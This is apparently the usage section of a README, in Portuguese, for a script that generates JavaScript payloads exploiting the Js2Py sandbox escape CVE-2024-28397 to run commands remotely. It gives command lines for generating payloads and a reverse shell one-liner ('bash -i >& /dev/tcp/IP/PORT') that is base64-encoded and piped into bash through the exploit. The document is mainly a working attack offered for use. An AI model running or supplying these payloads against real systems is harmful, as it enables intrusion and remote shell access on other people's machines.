
Gera payloads JavaScript para explorar o escape de sandbox do Js2Py (CVE-2024-28397), permitindo execução remota de comandos e shells reversos por meio da exposição de internos do Python.
Este script gera um payload JavaScript que pode ser avaliado pelo Js2Py em ambientes vulneráveis onde os internals do Python são expostos através de wrappers de objetos.
Execução básica de comando:
python3 cve-2024-28397.py -c "id"
Gere um payload compacto de uma linha:
python3 cve-2024-28397.py -c "whoami" --compact
Gere o payload Base64:
echo 'bash -i >& /dev/tcp/IP/PORT 0>&1' | base64 -w0
Gere o payload Js2Py:
python3 cve-2024-28397.py -c "bash -c 'echo BASE64_OUTPUT | base64 -d | bash'" --compact
Substitua BASE64_OUTPUT pela string Base64 gerada no primeiro passo.